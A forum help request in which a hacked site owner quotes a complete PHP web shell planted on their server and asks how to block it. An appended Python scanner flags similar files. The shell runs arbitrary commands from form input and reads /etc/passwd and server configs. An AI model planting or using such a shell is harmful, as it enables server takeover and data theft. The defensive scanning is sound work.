I got hacked and the following code was placed within my files:
Code:
<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would I patch this? Like, is there any code I can add to a global file to prevent this "safemode bypass"?
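Added example, not part of the original post: a Python sketch that walks a web root and flags PHP files showing the same traits as the shell quoted above (restoring `safe_mode`/`open_basedir`, probing for and calling command-execution functions, reading request input). The indicator names, sample strings and file suffixes are assumptions of this example, and a hit is a lead for manual review rather than proof.

```python
import re
import sys
from pathlib import Path

# Indicators taken from the shell quoted above; the names are this example's own.
INDICATORS = {
    "restores_restriction": re.compile(
        r"ini_restore\s*\(\s*['\"](safe_mode|open_basedir)['\"]", re.I),
    "probes_exec_functions": re.compile(
        r"function_exists\s*\(\s*['\"](exec|shell_exec|system|passthru|popen)['\"]", re.I),
    # The lookbehind skips methods and longer names such as $db->exec( or curl_exec(
    "runs_os_command": re.compile(
        r"(?<![\w>$:])(exec|shell_exec|system|passthru|popen)\s*\(", re.I),
    "reads_request_input": re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b"),
}
# Constructed samples: a fragment in the style of the shell above, and a benign page.
SAMPLE_SHELL = """<?
ini_restore("safe_mode");
if(function_exists('exec')) { @exec($komut,$res); }
if($_POST[baba]!= "") { $out=safeshell($_POST[baba]); }
?>"""
SAMPLE_BENIGN = """<?php
$name = htmlspecialchars($_POST['name']);
$db->exec('UPDATE hits SET n = n + 1');
echo "Hello $name";
"""

def scan_source(text):
    """Return the sorted names of the indicators found in one PHP source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def is_suspicious(hits):
    """Restriction tampering, or OS command execution in a file that reads request input."""
    return ("restores_restriction" in hits
            or {"runs_os_command", "reads_request_input"} <= set(hits))

def scan_tree(root, suffixes=(".php", ".phtml", ".inc")):
    """Return {relative path: hits} for files under root that deserve manual review."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_source(path.read_text(errors="replace"))
            if is_suspicious(hits):
                findings[path.relative_to(root).as_posix()] = hits
    return findings

if __name__ == "__main__":
    for name, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f"{name}: {', '.join(hits)}")
```

Run it with the web root as the only argument. Removing a flagged file does not close whatever hole allowed it to be written, so that still has to be found separately.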